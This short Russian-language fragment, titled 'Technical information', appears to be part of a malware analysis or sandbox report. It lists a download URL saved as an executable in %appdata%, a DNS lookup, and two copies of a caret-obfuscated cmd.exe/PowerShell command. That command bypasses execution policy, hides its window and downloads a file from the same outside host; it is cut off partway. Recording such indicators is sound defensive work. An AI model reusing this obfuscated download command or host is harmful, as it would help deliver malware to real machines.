Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OwERs^H^ELL^.^ExE^ -E^xe^cuT^iO^npOl^Ic^y ^By^PasS^ -^n^o^pRo^fI^L^e ^-^winDo^wsTyLE^ H^idde^n (nEW-o^BJ^eCt S^YSte^m.^NeT.w^EbcLieN^t).DOWnLoaD^f^ILE('http://smoeroot...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "p^OwERs^H^ELL^.^ExE^ -E^xe^cuT^iO^npOl^Ic^y ^By^PasS^ -^n^o^pRo^fI^L^e ^-^winDo^wsTyLE^ H^idde^n (nEW-o^BJ^eCt S^YSte^m.^NeT.w^EbcLieN^t).DOWnLoaD^f^ILE('http://smoeroot...' (со скрытым окном)